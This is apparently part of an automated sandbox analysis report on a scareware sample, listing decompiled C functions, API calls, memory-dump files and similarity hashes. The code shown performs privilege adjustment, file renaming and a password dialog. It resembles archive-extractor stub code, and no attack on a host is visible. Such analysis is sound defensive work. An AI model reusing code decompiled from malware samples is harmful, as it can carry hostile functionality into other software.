                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CapsDeviceRelease
                                                                                                                                                      • String ID: C:\Users\user\Desktop\Endermanch@AnViPC2009.exe
                                                                                                                                                      • API String ID: 127614599-3754918145
                                                                                                                                                      • Opcode ID: 3c746edb9f9f92353186b46facc40910de06bd69763ea3c9d2de41071d68adb9
                                                                                                                                                      • Instruction ID: 63da3f036025e0b802933281b33f18f86a820d418aeccf2ba8fa70387ff53a06
                                                                                                                                                      • Opcode Fuzzy Hash: 3c746edb9f9f92353186b46facc40910de06bd69763ea3c9d2de41071d68adb9
                                                                                                                                                      • Instruction Fuzzy Hash: 47E01A36549714ABE310DB11EE4AB877A64AB25B12F018036FB01AA1E0C7B94464CBED
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 97%
                                                                                                                                                      			E00404B10(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                      				char _v1028;
                                                                                                                                                      				char _v2052;
                                                                                                                                                      				char _v5156;
                                                                                                                                                      				char _v6212;
                                                                                                                                                      				char _v9412;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* _t38;
                                                                                                                                                      				void* _t51;
                                                                                                                                                      				int _t57;
                                                                                                                                                      				void* _t68;
                                                                                                                                                      				void* _t69;
                                                                                                                                                      				void* _t80;
                                                                                                                                                      
                                                                                                                                                      				E00401200(0x24c0);
                                                                                                                                                      				_t70 =  &_v9412;
                                                                                                                                                      				E00403517( &_v9412);
                                                                                                                                                      				_t77 = _a4;
                                                                                                                                                      				_t68 = 0;
                                                                                                                                                      				_push(0);
                                                                                                                                                      				if(E00406007( &_v9412, __edx, _a4, _a8,  &_v9412) == 0 || _v9412 == 0 || _v6212 == 0 || E0040DAE4(E004073B4( &_v9412),  &_v6212) == 0) {
                                                                                                                                                      					L15:
                                                                                                                                                      					__eflags = 0;
                                                                                                                                                      					return 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t38 = E0040DAE4(E004073B4(_t77),  &_v6212);
                                                                                                                                                      					_t86 = _t38;
                                                                                                                                                      					if(_t38 != 0) {
                                                                                                                                                      						goto L15;
                                                                                                                                                      					}
                                                                                                                                                      					while(1) {
                                                                                                                                                      						E0040DBC0( &_v1028, _t77, 0x400);
                                                                                                                                                      						E0040A5E9(_t70, E004073B4( &_v1028), "rtmp%d", _t68);
                                                                                                                                                      						_t80 = _t80 + 0xc;
                                                                                                                                                      						if(E0040572E(_t86,  &_v1028, 0) == 0) {
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						_t68 = _t68 + 0x7b;
                                                                                                                                                      						_t88 = _t68 - 0x2710;
                                                                                                                                                      						if(_t68 < 0x2710) {
                                                                                                                                                      							continue;
                                                                                                                                                      						}
                                                                                                                                                      						break;
                                                                                                                                                      					}
                                                                                                                                                      					if(E0040572E(_t88,  &_v1028, 0) != 0) {
                                                                                                                                                      						goto L15;
                                                                                                                                                      					}
                                                                                                                                                      					E0040DBC0( &_v2052, _t77, 0x400);
                                                                                                                                                      					_t51 = E004073B4( &_v9412);
                                                                                                                                                      					E0040A450(E004073B4( &_v2052), _t51);
                                                                                                                                                      					_t57 = MoveFileA( &_v2052,  &_v1028);
                                                                                                                                                      					_t90 = _t57;
                                                                                                                                                      					if(_t57 == 0) {
                                                                                                                                                      						goto L15;
                                                                                                                                                      					}
                                                                                                                                                      					E00404E8A( &_v5156);
                                                                                                                                                      					_t69 = 0;
                                                                                                                                                      					if(E0040572E(_t90, _t77, 0) == 0) {
                                                                                                                                                      						_t69 = E0040519F( &_v5156, _t77, 0, 1);
                                                                                                                                                      					}
                                                                                                                                                      					MoveFileA( &_v1028,  &_v2052);
                                                                                                                                                      					if(_t69 != 0) {
                                                                                                                                                      						E00404EF5( &_v5156);
                                                                                                                                                      						E00404F73( &_v5156);
                                                                                                                                                      					}
                                                                                                                                                      					E0040503B(_t69,  &_v5156);
                                                                                                                                                      					return 1;
                                                                                                                                                      				}
                                                                                                                                                      			}















                                                                                                                                                      0x00404b18
                                                                                                                                                      0x00404b20
                                                                                                                                                      0x00404b26
                                                                                                                                                      0x00404b2b
                                                                                                                                                      0x00404b2e
                                                                                                                                                      0x00404b30
                                                                                                                                                      0x00404b43
                                                                                                                                                      0x00404ca9
                                                                                                                                                      0x00404ca9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404b82
                                                                                                                                                      0x00404b90
                                                                                                                                                      0x00404b95
                                                                                                                                                      0x00404b97
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404ba2
                                                                                                                                                      0x00404bab
                                                                                                                                                      0x00404bc3
                                                                                                                                                      0x00404bc8
                                                                                                                                                      0x00404bdb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404bdd
                                                                                                                                                      0x00404be0
                                                                                                                                                      0x00404be6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404be6
                                                                                                                                                      0x00404bf8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404c07
                                                                                                                                                      0x00404c13
                                                                                                                                                      0x00404c26
                                                                                                                                                      0x00404c3f
                                                                                                                                                      0x00404c41
                                                                                                                                                      0x00404c43
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404c4b
                                                                                                                                                      0x00404c53
                                                                                                                                                      0x00404c5c
                                                                                                                                                      0x00404c6e
                                                                                                                                                      0x00404c6e
                                                                                                                                                      0x00404c7e
                                                                                                                                                      0x00404c82
                                                                                                                                                      0x00404c8a
                                                                                                                                                      0x00404c95
                                                                                                                                                      0x00404c95
                                                                                                                                                      0x00404ca0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404ca5

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040DAE4: CompareStringA.KERNEL32(00000400,00001001,0040BA7B,000000FF,?,000000FF,0040BA7B,?,STATIC), ref: 0040DAFA
                                                                                                                                                        • Part of subcall function 0040A5E9: wvsprintfA.USER32(00000000,74905AD0,00414C88), ref: 0040A5FC
                                                                                                                                                        • Part of subcall function 0040572E: GetFileAttributesW.KERNEL32(?,00404CD9,00000045,?,?,?,?), ref: 00405746
                                                                                                                                                      • MoveFileA.KERNEL32 ref: 00404C3F
                                                                                                                                                      • MoveFileA.KERNEL32 ref: 00404C7E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Move$AttributesCompareStringwvsprintf
                                                                                                                                                      • String ID: rtmp%d
                                                                                                                                                      • API String ID: 1782884900-3303766350
                                                                                                                                                      • Opcode ID: 1cbd80d99daa1404a2d8eff1a901c50babaa5db9882dbe09bf1e01a52a40875f
                                                                                                                                                      • Instruction ID: 1b9ecc460017d4d072db3072db9ce213105e6f11f926c4709b6f9220371b689f
                                                                                                                                                      • Opcode Fuzzy Hash: 1cbd80d99daa1404a2d8eff1a901c50babaa5db9882dbe09bf1e01a52a40875f
                                                                                                                                                      • Instruction Fuzzy Hash: CE4122F680511865DF20E6A18C45FEB73BCAF4534CF0504BBBB04B71C2DA3DAA498E68
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 60%
                                                                                                                                                      			E00403746(void* __edx, void* __eflags, intOrPtr _a4, CHAR* _a8, WCHAR* _a12) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				char _v12;
                                                                                                                                                      				char _v16;
                                                                                                                                                      				void* _t13;
                                                                                                                                                      				int _t15;
                                                                                                                                                      				void* _t17;
                                                                                                                                                      				intOrPtr _t38;
                                                                                                                                                      
                                                                                                                                                      				_t13 = E00406E67();
                                                                                                                                                      				if(_t13 == 0) {
                                                                                                                                                      					return _t13;
                                                                                                                                                      				}
                                                                                                                                                      				_t29 = _a4;
                                                                                                                                                      				_v16 = 0;
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_t15 = E004024CD(_a4, __edx,  &_v16, 0);
                                                                                                                                                      				if(_t15 != 0) {
                                                                                                                                                      					E0040346B();
                                                                                                                                                      					_t17 = 7;
                                                                                                                                                      					_t38 =  *0x41486d; // 0x0
                                                                                                                                                      					if(_t38 != 0) {
                                                                                                                                                      						_t17 = 0xf;
                                                                                                                                                      					}
                                                                                                                                                      					_push(_v16);
                                                                                                                                                      					_push(_t17);
                                                                                                                                                      					if(_a12 == 0) {
                                                                                                                                                      						_t15 = SetFileSecurityA(_a8, ??, ??);
                                                                                                                                                      					} else {
                                                                                                                                                      						_t15 = SetFileSecurityW(_a12, ??, ??);
                                                                                                                                                      					}
                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                      						E00402C51(E0040B282(_t29 + 0x17, E004098D0(0x3e4), _a8));
                                                                                                                                                      						_t15 = E0040321D(0x414c7c, 1);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				if(_v16 != 0) {
                                                                                                                                                      					_t15 = E0040A1DE(_v16);
                                                                                                                                                      				}
                                                                                                                                                      				return _t15;
                                                                                                                                                      			}










                                                                                                                                                      0x0040374c
                                                                                                                                                      0x00403753
                                                                                                                                                      0x004037ec
                                                                                                                                                      0x004037ec
                                                                                                                                                      0x0040375b
                                                                                                                                                      0x00403767
                                                                                                                                                      0x0040376a
                                                                                                                                                      0x0040376d
                                                                                                                                                      0x00403770
                                                                                                                                                      0x00403777
                                                                                                                                                      0x00403779
                                                                                                                                                      0x00403780
                                                                                                                                                      0x00403781
                                                                                                                                                      0x00403787
                                                                                                                                                      0x0040378b
                                                                                                                                                      0x0040378b
                                                                                                                                                      0x0040378c
                                                                                                                                                      0x0040378f
                                                                                                                                                      0x00403793
                                                                                                                                                      0x004037a3
                                                                                                                                                      0x00403795
                                                                                                                                                      0x00403798
                                                                                                                                                      0x00403798
                                                                                                                                                      0x004037ab
                                                                                                                                                      0x004037ce
                                                                                                                                                      0x004037d7
                                                                                                                                                      0x004037d7
                                                                                                                                                      0x004037ab
                                                                                                                                                      0x004037df
                                                                                                                                                      0x004037e4
                                                                                                                                                      0x004037e4
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406E67: GetVersionExA.KERNEL32(?), ref: 00406E8B
                                                                                                                                                        • Part of subcall function 0040346B: GetCurrentProcess.KERNEL32(00000020,?,00000000,0040377E,?,00000000,?,?), ref: 0040348D
                                                                                                                                                        • Part of subcall function 0040346B: OpenProcessToken.ADVAPI32(00000000), ref: 00403494
                                                                                                                                                        • Part of subcall function 0040346B: LookupPrivilegeValueA.ADVAPI32 ref: 004034BE
                                                                                                                                                        • Part of subcall function 0040346B: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 004034D5
                                                                                                                                                        • Part of subcall function 0040346B: GetLastError.KERNEL32 ref: 004034DB
                                                                                                                                                        • Part of subcall function 0040346B: LookupPrivilegeValueA.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 004034F6
                                                                                                                                                        • Part of subcall function 0040346B: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00403507
                                                                                                                                                        • Part of subcall function 0040346B: CloseHandle.KERNEL32(?), ref: 0040350C
                                                                                                                                                      • SetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?), ref: 00403798
                                                                                                                                                      • SetFileSecurityA.ADVAPI32(?,00000007,?), ref: 004037A3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Token$AdjustFileLookupPrivilegePrivilegesProcessSecurityValue$CloseCurrentErrorHandleLastOpenVersion
                                                                                                                                                      • String ID: |LA
                                                                                                                                                      • API String ID: 4147173873-4290591017
                                                                                                                                                      • Opcode ID: 2f3935b15ce0c6d73ba49c4bf65e523c3259b44d2efd6eb3383029117e584d5c
                                                                                                                                                      • Instruction ID: 355c1649bab0bb0e583114448a6b1cef199babb298150b7077b23b9de284e497
                                                                                                                                                      • Opcode Fuzzy Hash: 2f3935b15ce0c6d73ba49c4bf65e523c3259b44d2efd6eb3383029117e584d5c
                                                                                                                                                      • Instruction Fuzzy Hash: D1119EB2900219BBCF017FA59C8199E7F68AB04309F00C47BF905BB2C2C77D8B519B99
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 44%
                                                                                                                                                      			E00402C52(intOrPtr _a4, long _a8, int* _a12, intOrPtr _a16) {
                                                                                                                                                      				struct HWND__* _t9;
                                                                                                                                                      				int _t14;
                                                                                                                                                      				int _t15;
                                                                                                                                                      				struct HWND__* _t17;
                                                                                                                                                      				int* _t18;
                                                                                                                                                      
                                                                                                                                                      				if( *0x41a792 == 0) {
                                                                                                                                                      					__eflags = _a4 - 2;
                                                                                                                                                      					_t9 =  *0x419f80; // 0x0
                                                                                                                                                      					_t17 = _t9;
                                                                                                                                                      					if(_a4 == 2) {
                                                                                                                                                      						_t15 = IsWindowVisible(_t9);
                                                                                                                                                      						__eflags = _t15;
                                                                                                                                                      						if(_t15 == 0) {
                                                                                                                                                      							_t17 = 0;
                                                                                                                                                      							__eflags = 0;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					__eflags =  *0x419ee8; // 0x0
                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                      						L9:
                                                                                                                                                      						_t18 = _a12;
                                                                                                                                                      						E0040A450(_t18, 0x419ee8);
                                                                                                                                                      					} else {
                                                                                                                                                      						_t14 = DialogBoxParamA( *0x414c74, "GETPASSWORD1", _t17, E0040B1EC, _a8);
                                                                                                                                                      						__eflags = _t14;
                                                                                                                                                      						if(_t14 != 0) {
                                                                                                                                                      							goto L9;
                                                                                                                                                      						} else {
                                                                                                                                                      							_t18 = _a12;
                                                                                                                                                      							 *_t18 = 0;
                                                                                                                                                      							 *0x419f78 = 1;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					__eflags =  *_t18;
                                                                                                                                                      					if( *_t18 != 0) {
                                                                                                                                                      						_push(0x80);
                                                                                                                                                      						_push(_t18);
                                                                                                                                                      						_push(0x41a792);
                                                                                                                                                      						goto L12;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					_push(_a16);
                                                                                                                                                      					_t18 = _a12;
                                                                                                                                                      					_push(0x41a792);
                                                                                                                                                      					_push(_t18);
                                                                                                                                                      					L12:
                                                                                                                                                      					E0040A484();
                                                                                                                                                      				}
                                                                                                                                                      				return 0 |  *_t18 != 0x00000000;
                                                                                                                                                      			}








                                                                                                                                                      0x0040bc40
                                                                                                                                                      0x0040bc50
                                                                                                                                                      0x0040bc54
                                                                                                                                                      0x0040bc59
                                                                                                                                                      0x0040bc5b
                                                                                                                                                      0x0040bc5e
                                                                                                                                                      0x0040bc64
                                                                                                                                                      0x0040bc66
                                                                                                                                                      0x0040bc68
                                                                                                                                                      0x0040bc68
                                                                                                                                                      0x0040bc68
                                                                                                                                                      0x0040bc66
                                                                                                                                                      0x0040bc6a
                                                                                                                                                      0x0040bc70
                                                                                                                                                      0x0040bca1
                                                                                                                                                      0x0040bca1
                                                                                                                                                      0x0040bcaa
                                                                                                                                                      0x0040bc72
                                                                                                                                                      0x0040bc86
                                                                                                                                                      0x0040bc8c
                                                                                                                                                      0x0040bc8e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bc90
                                                                                                                                                      0x0040bc90
                                                                                                                                                      0x0040bc93
                                                                                                                                                      0x0040bc95
                                                                                                                                                      0x0040bc95
                                                                                                                                                      0x0040bc8e
                                                                                                                                                      0x0040bcaf
                                                                                                                                                      0x0040bcb1
                                                                                                                                                      0x0040bcb3
                                                                                                                                                      0x0040bcb8
                                                                                                                                                      0x0040bcb9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bcb9
                                                                                                                                                      0x0040bc42
                                                                                                                                                      0x0040bc42
                                                                                                                                                      0x0040bc45
                                                                                                                                                      0x0040bc48
                                                                                                                                                      0x0040bc4d
                                                                                                                                                      0x0040bcbe
                                                                                                                                                      0x0040bcbe
                                                                                                                                                      0x0040bcbe
                                                                                                                                                      0x0040bccd

                                                                                                                                                      APIs
                                                                                                                                                      • IsWindowVisible.USER32(00000000), ref: 0040BC5E
                                                                                                                                                      • DialogBoxParamA.USER32 ref: 0040BC86
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DialogParamVisibleWindow
                                                                                                                                                      • String ID: GETPASSWORD1
                                                                                                                                                      • API String ID: 3157717868-3292211884
                                                                                                                                                      • Opcode ID: 319404afec191ab303e6cbde0849cd7afbbf84ff66a978a53748cd3c03a14d26
                                                                                                                                                      • Instruction ID: 19e5e80469afbb98079fb6f772f9c71b75358f1e78d2d2fb07fd4d161fcb281a
                                                                                                                                                      • Opcode Fuzzy Hash: 319404afec191ab303e6cbde0849cd7afbbf84ff66a978a53748cd3c03a14d26
                                                                                                                                                      • Instruction Fuzzy Hash: 0A01C2312493557BEB229F209D45AD73B54EA11714B14843FF840732D1DB789D9093DE
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%